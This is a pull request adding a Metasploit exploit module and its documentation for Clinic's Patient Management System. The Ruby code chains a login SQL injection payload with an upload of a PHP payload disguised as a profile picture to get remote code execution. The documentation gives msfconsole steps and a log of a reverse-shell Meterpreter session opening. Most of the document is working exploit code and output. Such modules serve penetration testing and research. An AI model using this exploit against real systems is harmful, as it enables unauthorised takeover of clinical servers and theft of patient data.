### PR TITLE
Clinic Patient's Management System SQLi (CVE-2025-3096)

### DIFF
--- a/documentation/modules/exploit/multi/http/clinic_pms_sqli_to_rce.md
+++ b/documentation/modules/exploit/multi/http/clinic_pms_sqli_to_rce.md
@@ -1,5 +1,6 @@
 ## Vulnerable Application
-Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.
+Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability
+(CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/multi/http/clinic_pms_sqli_to_rce.md
+++ b/documentation/modules/exploit/multi/http/clinic_pms_sqli_to_rce.md
@@ -1,0 +1,67 @@
+## Vulnerable Application
+Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.
+
+## Verification Steps
+
+### Vulnerable Application Installation Setup
+1. Install Clinic's Patient Management System on your web server.
+   - Download the Web Application from [here](https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code)
+
+2. Start `msfconsole` and load the exploit module:
+```bash
+   msfconsole
+   use exploit/multi/http/clinic_pms_sqli_to_rce
+```
+
+3. Set the required options:
+```bash
+   set rport <port>
+   set rhost <ip>
+   set targeturi /pms
+```
+
+4. Check if the target is vulnerable:
+```bash
+   check
+```
+
+   If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
+```
+   [+] <IP> The target is vulnerable.
+```
+
+5. Set up the listener for the exploit:
+```bash
+   set lport <port>
+   set lhost <ip>
+```
+
+6. Launch the exploit:
+```bash
+   exploit
+```
+
+7. If successful, you will receive a PHP Meterpreter shell.
+
+## Options
+- `TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).
+
+## Scenarios
+
+```bash
+msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > exploit
+[*] Started reverse TCP handler on 192.168.168.128:4444
+[*] Logged using SQL injection..
+[*] Malicious file uploaded..
+[*] Logged out..
+[*] Logged using SQL injection..
+[*] Sending stage (40004 bytes) to 192.168.168.146
+[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:52522) at 2025-05-13 13:33:52 +0200
+
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
+Meterpreter : php/linux
+
+```
+

--- a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
+++ b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2025-3096'],
           ['URL', 'https://www.cve.org/CVERecord?id=CVE-2022-40471'],
         ],
-        'DisclosureDate' => '2021-10-21',
+        'DisclosureDate' => '2021-01-04',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options([
       OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']),
-      OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', false])
+      OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', true])
     ])
   end
 
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Checking if target is vulnerable...')
 
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/'),
+      'uri' => normalize_uri(target_uri.path),
       'method' => 'GET'
     })
 
@@ -60,12 +60,12 @@ class MetasploitModule < Msf::Exploit::Remote
     return Exploit::CheckCode::Unknown('Unexpected content of body') if res.body&.blank?
     return Exploit::CheckCode::Safe('Clinic PMS not detected') unless res.body.include?("Clinic's Patient Management System in PHP")
 
-    return Exploit::CheckCode::Vulnerable('Clinic PMS detected')
+    return Exploit::CheckCode::Appears('Clinic PMS detected')
   end
 
   def login_sqli
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/index.php'),
+      'uri' => normalize_uri(target_uri.path + 'index.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'vars_post' =>
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def logout
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/logout.php'),
+      'uri' => normalize_uri(target_uri.path + 'logout.php'),
       'method' => 'GET'
     })
     fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302

--- a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
+++ b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -8,7 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::PhpEXE
   include Msf::Exploit::FileDropper
-  include Msf::Post::File
+  # include Msf::Post::File
   include Msf::Auxiliary::Report
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']),
+      OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms/']),
       OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', true])
     ])
   end
@@ -181,12 +181,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with Failure::PayloadFailed, 'Cannot find path to payload' if payload_path.blank?
 
+    register_file_for_cleanup(File.basename(payload_path)) if datastore['DELETE_FILES']
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, payload_path),
       'method' => 'GET',
       'keep_cookies' => true
     })
-    register_file_for_cleanup(File.basename(payload_path)) if datastore['DELETE_FILES']
   end
 
   def exploit

--- a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
+++ b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2025-3096'],
           ['URL', 'https://www.cve.org/CVERecord?id=CVE-2022-40471'],
         ],
-        'DisclosureDate' => '2021-01-04',
+        'DisclosureDate' => '2025-01-04',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],

--- a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
+++ b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::PhpEXE
   include Msf::Exploit::FileDropper
+  include Msf::Post::File
   include Msf::Auxiliary::Report
 
   def initialize(info = {})
@@ -153,6 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
     logout
     login_sqli
 
+    print_status('Reporting vulnerability')
     report_vuln(
       host: datastore['RHOSTS'],
       name: name,
@@ -182,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'keep_cookies' => true
     })
-    register_file_for_cleanup(payload_path) if datastore['DELETE_FILES']
+    register_file_for_cleanup(File.basename(payload_path)) if datastore['DELETE_FILES']
   end
 
   def exploit

--- a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
+++ b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -1,0 +1,176 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Clinic\'s Patient Management System 1.0 - Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an SQL injection in login portal, which allows to log in as admin. Next, it allows the attacker to upload malicious files through user modification to achieve RCE.
+        },
+        'Author' => [
+          'msutovsky-r7'
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Privileged' => false,
+        'Targets' => [
+          ['Clinic Patient Management System 1.0', {}]
+        ],
+        'DefaultTarget' => 0,
+        'References' => [
+          ['URL', 'https://www.exploit-db.com/exploits/50439'],
+          ['URL', ' https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e']
+        ],
+        'DisclosureDate' => '2021-10-21',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to the Clinic Patient Management System', '/pms']),
+      OptBool.new('DELETE_FILES', [true, 'Delete uploaded files after exploitation', false])
+    ])
+  end
+
+  def check
+    print_status('Checking if target is vulnerable...')
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path + '/'),
+      'method' => 'GET'
+    })
+
+    return Exploit::CheckCode::Unknown('Unexpected response code from server') unless res&.code == 200
+    return Exploit::CheckCode::Unknown('Unexpected content of body') if res.body&.blank?
+    return Exploit::CheckCode::Safe('Clinic PMS not detected') unless res.body.include?("Clinic's Patient Management System in PHP")
+
+    return Exploit::CheckCode::Vulnerable('Clinic PMS detected')
+  end
+
+  def login_sqli
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path + '/index.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'vars_post' =>
+      {
+        user_name: "' or '1'='1' LIMIT 1;--",
+        password: '',
+        login: ''
+      }
+    })
+
+    fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
+    fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('location')
+
+    fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['location'] == 'dashboard.php'
+    print_status('Logged using SQL injection..')
+  end
+
+  def upload_payload
+    username = Rex::Text.rand_text_alphanumeric(8)
+    password = Rex::Text.rand_text_alphanumeric(8)
+    filename = Rex::Text.rand_text_alphanumeric(8) + '.php'
+
+    boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(16)}"
+
+    data_post = "--#{boundary}\r\n"
+    data_post << "Content-Disposition: form-data; name=\"hidden_id\"\r\n\r\n"
+    data_post << "1\r\n"
+    data_post << "--#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"display_name\"\r\n\r\n"
+    data_post << "#{username}\r\n"
+    data_post << "--#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"username\"\r\n\r\n"
+    data_post << "#{username}\r\n"
+    data_post << "--#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"password\"\r\n\r\n"
+    data_post << "#{password}\r\n"
+    data_post << "--#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"profile_picture\"; filename=\"#{filename}\"\r\n"
+    data_post << "Content-Type: application/x-php\r\n\r\n"
+    data_post << "#{payload.encoded}\r\n"
+    data_post << "--#{boundary}\r\n"
+
+    data_post << "Content-Disposition: form-data; name=\"save_user\"\r\n\r\n"
+    data_post << "\r\n"
+    data_post << "--#{boundary}--\r\n"
+
+    res = send_request_cgi({
+      'uri' => normalize_uri('/pms/update_user.php?user_id=1'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => data_post
+    })
+
+    fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
+    fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('Location')
+
+    fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'congratulation.php?goto_page=users.php&message=user update successfully'
+    print_status('Malicious file uploaded..')
+  end
+
+  def logout
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path + '/logout.php'),
+      'method' => 'GET'
+    })
+    fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
+    fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('Location')
+
+    fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'index.php'
+    print_status('Logged out..')
+    @cookie_jar.clear
+  end
+
+  def trigger_payload
+    logout
+    login_sqli
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path + '/update_user.php?user_id=1'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    })
+
+    fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 200
+    fail_with Failure::UnexpectedReply, 'Unexpected content of body' if res.body&.blank?
+    html_document = res.get_html_document
+    payload_path = html_document.xpath('//img[@alt="User Image"]/@src')&.text
+
+    fail_with Failure::PayloadFailed, 'Cannot find path to payload' if payload_path.blank?
+
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path + '/' + payload_path),
+      'method' => 'GET',
+      'keep_cookies' => true
+    })
+    register_file_for_cleanup(payload_path) if datastore['DELETE_FILES']
+  end
+
+  def exploit
+    login_sqli
+    upload_payload
+    trigger_payload
+  end
+end

--- a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
+++ b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data_post << "--#{boundary}--\r\n"
 
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, '/pms/update_user.php'),
+      'uri' => normalize_uri(target_uri.path, 'update_user.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'ctype' => "multipart/form-data; boundary=#{boundary}",

--- a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
+++ b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
   include Msf::Post::File
   include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -20,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits an SQL injection in login portal, which allows to log in as admin. Next, it allows the attacker to upload malicious files through user modification to achieve RCE.
         },
         'Author' => [
-          'msutovsky-r7' # CVE-2025-3096, module developer
+          'msutovsky-r7', # CVE-2025-3096, module developer
+          'Ashish Kumar' # CVE-2022-2297
         ],
         'License' => MSF_LICENSE,
         'Platform' => 'php',
@@ -39,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
         }
       )
     )
@@ -67,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def login_sqli
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + 'index.php'),
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'vars_post' =>
@@ -119,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
     data_post << "--#{boundary}--\r\n"
 
     res = send_request_cgi({
-      'uri' => normalize_uri('/pms/update_user.php'),
+      'uri' => normalize_uri(target_uri.path, '/pms/update_user.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'ctype' => "multipart/form-data; boundary=#{boundary}",
@@ -133,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
     fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('Location')
 
-    fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'congratulation.php?goto_page=users.php&message=user update successfully'
+    fail_with Failure::UnexpectedReply, 'Failed to update user when attempting to exploit' unless res.headers['Location'] == 'congratulation.php?goto_page=users.php&message=user update successfully'
     print_status('Malicious file uploaded..')
   end
 
@@ -145,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 302
     fail_with Failure::NotVulnerable, 'Application might be patched' unless res.headers&.key?('Location')
 
-    fail_with Failure::Unknown, 'Unknown error happened' unless res.headers['Location'] == 'index.php'
+    fail_with Failure::UnexpectedReply, 'The Location header was not equal to \'index.php\' as expected' unless res.headers['Location'] == 'index.php'
     print_status('Logged out..')
     @cookie_jar.clear
   end
@@ -163,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/update_user.php'),
+      'uri' => normalize_uri(target_uri.path, '/update_user.php'),
       'method' => 'GET',
       'keep_cookies' => true,
       'vars_get' =>
@@ -180,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with Failure::PayloadFailed, 'Cannot find path to payload' if payload_path.blank?
 
     send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/' + payload_path),
+      'uri' => normalize_uri(target_uri.path, payload_path),
       'method' => 'GET',
       'keep_cookies' => true
     })

--- a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
+++ b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -18,19 +18,20 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits an SQL injection in login portal, which allows to log in as admin. Next, it allows the attacker to upload malicious files through user modification to achieve RCE.
         },
         'Author' => [
-          'msutovsky-r7'
+          'msutovsky-r7' # CVE-2025-3096, module developer
         ],
         'License' => MSF_LICENSE,
         'Platform' => 'php',
         'Arch' => ARCH_PHP,
         'Privileged' => false,
         'Targets' => [
-          ['Clinic Patient Management System 1.0', {}]
+          ['Clinic Patient Management System 2.0', {}]
         ],
         'DefaultTarget' => 0,
         'References' => [
-          ['URL', 'https://www.exploit-db.com/exploits/50439'],
-          ['URL', ' https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e']
+          ['CVE', '2022-2297'],
+          ['CVE', '2025-3096'],
+          ['URL', 'https://www.cve.org/CVERecord?id=CVE-2022-40471'],
         ],
         'DisclosureDate' => '2021-10-21',
         'Notes' => {
@@ -116,10 +117,14 @@ class MetasploitModule < Msf::Exploit::Remote
     data_post << "--#{boundary}--\r\n"
 
     res = send_request_cgi({
-      'uri' => normalize_uri('/pms/update_user.php?user_id=1'),
+      'uri' => normalize_uri('/pms/update_user.php'),
       'method' => 'POST',
       'keep_cookies' => true,
       'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'vars_get' =>
+      {
+        'user_id' => '1'
+      },
       'data' => data_post
     })
 
@@ -148,9 +153,13 @@ class MetasploitModule < Msf::Exploit::Remote
     login_sqli
 
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/update_user.php?user_id=1'),
+      'uri' => normalize_uri(target_uri.path + '/update_user.php'),
       'method' => 'GET',
-      'keep_cookies' => true
+      'keep_cookies' => true,
+      'vars_get' =>
+      {
+        'user_id' => '1'
+      }
     })
 
     fail_with Failure::UnexpectedReply, 'Unexpected response code' unless res&.code == 200

--- a/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
+++ b/modules/exploits/multi/http/clinic_pms_sqli_to_rce.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::PhpEXE
   include Msf::Exploit::FileDropper
+  include Msf::Auxiliary::Report
 
   def initialize(info = {})
     super(
@@ -151,6 +152,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def trigger_payload
     logout
     login_sqli
+
+    report_vuln(
+      host: datastore['RHOSTS'],
+      name: name,
+      refs: references,
+      info: 'The target is vulnerable to CVE-2025-3096.'
+    )
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path + '/update_user.php'),


### PR DESCRIPTION
## Vulnerable Application
Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.

## Verification Steps

### Vulnerable Application Installation Setup
1. Install Clinic's Patient Management System on your web server.
   - Download the Web Application from [here](https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code)

2. Start `msfconsole` and load the exploit module:
```bash
   msfconsole
   use exploit/multi/http/clinic_pms_sqli_to_rce
```

3. Set the required options:
```bash
   set rport <port>
   set rhost <ip>
   set targeturi /pms
```

4. Check if the target is vulnerable:
```bash
   check
```

   If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
```
   [+] <IP> The target is vulnerable.
```

5. Set up the listener for the exploit:
```bash
   set lport <port>
   set lhost <ip>
```

6. Launch the exploit:
```bash
   exploit
```

7. If successful, you will receive a PHP Meterpreter shell.

## Options
- `TARGETURI`: (Required) The base path to the Clinic Patient Management System (default: `/pms`).

## Scenarios

```bash
msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > exploit
[*] Started reverse TCP handler on 192.168.168.128:4444
[*] Logged using SQL injection..
[*] Malicious file uploaded..
[*] Logged out..
[*] Logged using SQL injection..
[*] Sending stage (40004 bytes) to 192.168.168.146
[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:52522) at 2025-05-13 13:33:52 +0200

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
Meterpreter : php/linux

```
